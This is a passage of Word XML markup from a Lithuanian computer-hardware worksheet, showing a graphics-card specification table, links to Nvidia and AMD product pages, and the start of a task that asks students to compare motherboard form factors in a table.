          <w:p w14:paraId="67D24486" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2A1626E4" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58209E2F"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Lizdai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="766146CA"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DisplayPort, HDMI, USB Type-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CE5ABCC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61FC60B0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="18E9B2DD" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2EDEC256"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Galio lygis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32D217FD"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260W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="40EF07F9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D11A4BD" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="756D9A88" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="587F97B5"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 xml:space="preserve">Papildomi maitinimo lizdai </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31EBE946"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8 pin + 8 pin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4260F932" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D44DA0B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6707C87F" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08CE38A3"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Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A5F87F9"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Q3'18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DF05596" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38105E8B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="78E1657A" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="30A38D59"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Našumo rodiklis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0D7267AD"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21581</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7900113D" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="12A2569C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="1F72C1F0" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="79FEEC1B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Rekomenduojama kaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43B4D280" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$999</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0AFC5ABC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E3196CC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1086E603" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2232C20E" w14:textId="0A59800D" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atli</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite surinktos informacijos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lyginamąją analizę ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>parašy</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvadas</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pasirem</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelė</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>je įrašytais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>parodymais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713F668D" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4D40B" w14:textId="2C486B0C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nvidia graphic cards. Prieiga per internetą: https://www.nvidia.com/en-eu/geforce/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F676EEF" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>AMD graphic cards. Prieiga per internetą: https://www.amd.com/en/rx-series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E177E80" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365CA667" w14:textId="2FDF771E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDARYTI IR </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽPILD</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>YTI</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>LENTELĘ</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>BEI</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">PALYGINTI KELIŲ </w:t>
      </w:r>
      <w:r w:rsidR="002E6444" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGRINDINIŲ PLOKŠČIŲ </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FORMOS FAKTORI</w:t>
      </w:r>
      <w:r w:rsidR="00F678C3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>US</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F04870" w14:textId="6339FE87" w:rsidR="00204C46" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kelių formos faktorių </w:t>
      </w:r>
      <w:r w:rsidR="00D90245" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pagrindin</w:t>
      </w:r>
      <w:r w:rsidR="002D2696" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">es </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">plokštes </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pvz., MINI ITX, MATX ir ATX skirtas stacionariems kompiuteriams</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir palygin</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų charakteristikas (</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okius procesorius palaiko, kokio tipo operatyvinę atmintį, kokio dažnio operatyvinę atmintį palaiko, koks operatyvinės atminties lizdų kiekis, kiek USB lizdų kiekis ir kokios versijos palaiko, kokie lizdai vidiniams diskams, koks darbinės magistralės dažnis, kokie fiziniai didžiai plokštės, kokias operacines sistemas palaiko)</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pagal pateiktą apačioje pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentel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4"/>
        <w:gridCol w:w="3306"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="33D3F31B" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="27BD6080" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pagrindinės plokštės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
